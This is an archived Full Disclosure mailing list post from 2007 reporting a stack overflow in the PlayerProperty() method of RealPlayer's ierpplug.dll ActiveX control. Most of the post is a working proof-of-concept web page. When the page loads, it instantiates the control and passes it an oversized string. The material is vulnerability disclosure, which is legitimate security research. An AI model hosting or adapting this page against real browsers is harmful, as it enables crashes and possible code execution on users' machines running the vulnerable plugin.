Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
From: Elazar Broad <elazarb () earthlink net>
Date: Mon, 26 Nov 2007 15:15:25 -0500 (GMT-05:00)

After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I 
originally posted is really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under 
the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but 
I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which 
I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control 
PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:

-------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

    while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
   
      var obj2 = obj.PlayerProperty(s);


   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">

 </body>
</html> 
-------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault